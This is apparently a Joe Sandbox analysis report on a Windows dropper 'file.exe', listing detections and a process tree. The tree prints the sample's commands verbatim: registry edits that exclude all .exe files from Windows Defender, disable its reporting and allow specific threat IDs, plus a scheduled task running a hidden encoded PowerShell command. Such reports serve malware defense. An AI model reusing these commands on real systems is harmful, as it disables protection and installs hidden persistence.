Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:753408
MD5:e99e15a440798e20c682eb859b3f7885
SHA1:b6f3b87894f51669dede0afe6cb4b504fe0ae614
SHA256:c3dd8a06d395f4772011ed42c0980a54b06915782a06873150462994ed92a712
Tags:exe
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Schedule system process
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5932 cmdline: C:\Users\user\Desktop\file.exe MD5: E99E15A440798E20C682EB859B3F7885)
    • Install.exe (PID: 4760 cmdline: .\Install.exe MD5: 65D01849A2062434BCE6C580CDA92A1D)
      • Install.exe (PID: 5620 cmdline: .\Install.exe /S /site_id "525403" MD5: 893793FBD70BA4A92919D09205D6C9C1)
        • forfiles.exe (PID: 4732 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 3096 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 1544 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 6180 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • forfiles.exe (PID: 5064 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
          • conhost.exe (PID: 1248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6152 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • reg.exe (PID: 6172 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
            • reg.exe (PID: 6208 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • schtasks.exe (PID: 6236 cmdline: schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6276 cmdline: schtasks /run /I /tn "gAhELFxgt" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6332 cmdline: schtasks /DELETE /F /TN "gAhELFxgt" MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6488 cmdline: schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\" DC /site_id 525403 /S" /V1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6316 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • gpupdate.exe (PID: 6752 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 47C68FE26B0188CDD80F744F7405FF26)
      • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • pJKKXsE.exe (PID: 6576 cmdline: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S MD5: 893793FBD70BA4A92919D09205D6C9C1)
    • powershell.exe (PID: 6604 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6176 cmdline: "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • reg.exe (PID: 6192 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6180 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4520 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2992 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 1364 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6216 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6156 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6232 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 1876 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 4036 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 2372 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 3668 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6268 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • reg.exe (PID: 6312 cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
  • gpscript.exe (PID: 6920 cmdline: gpscript.exe /RefreshSystemParam MD5: C48CBDC676E442BAF58920C5B7E556DE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Persistence and Installation Behavior

barindex
Sigma detected: Schedule system process
Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine: schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /S /site_id "525403", ParentImage: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe, ParentProcessId: 5620, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==", ProcessId: 6236, ProcessName: schtasks.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeAvira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exeAvira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeAvira: detection malicious, Label: HEUR/AGEN.1250601
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeReversingLabs: Detection: 51%
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exeReversingLabs: Detection: 51%
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040553A FindFirstFileA,1_2_0040553A
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,1_2_004055DE
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\__data__\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: powershell.exe, 00000018.00000002.420007208.00000173FD929000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.430262427.0000000000DCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000018.00000002.352296909.00000173E56E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.432102762.00000000037B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: Install.exe, 00000005.00000002.484866347.0000000001ABA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

barindex
Very long command line found
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: Commandline size = 3260
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeProcess created: Commandline size = 3260Jump to behavior
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile deleted: C:\Windows\SysWOW64\GroupPolicySMsYeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile created: C:\Windows\system32\GroupPolicy\gpt.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004162A61_2_004162A6
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040E5A51_2_0040E5A5
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004126B01_2_004126B0
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00403A011_2_00403A01
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00418EF11_2_00418EF1
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00418FCB1_2_00418FCB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FF9A564198824_2_00007FF9A5641988
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00E4CA4831_2_00E4CA48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00E48BA831_2_00E48BA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00E48BB031_2_00E48BB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_067DB79031_2_067DB790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DF0E831_2_068DF0E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D100031_2_068D1000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D101031_2_068D1010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068E865831_2_068E8658
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DB4F931_2_068DB4F9
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00413954 appears 179 times
Source: file.exe, 00000001.00000000.284047943.0000000000427000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: file.exeBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
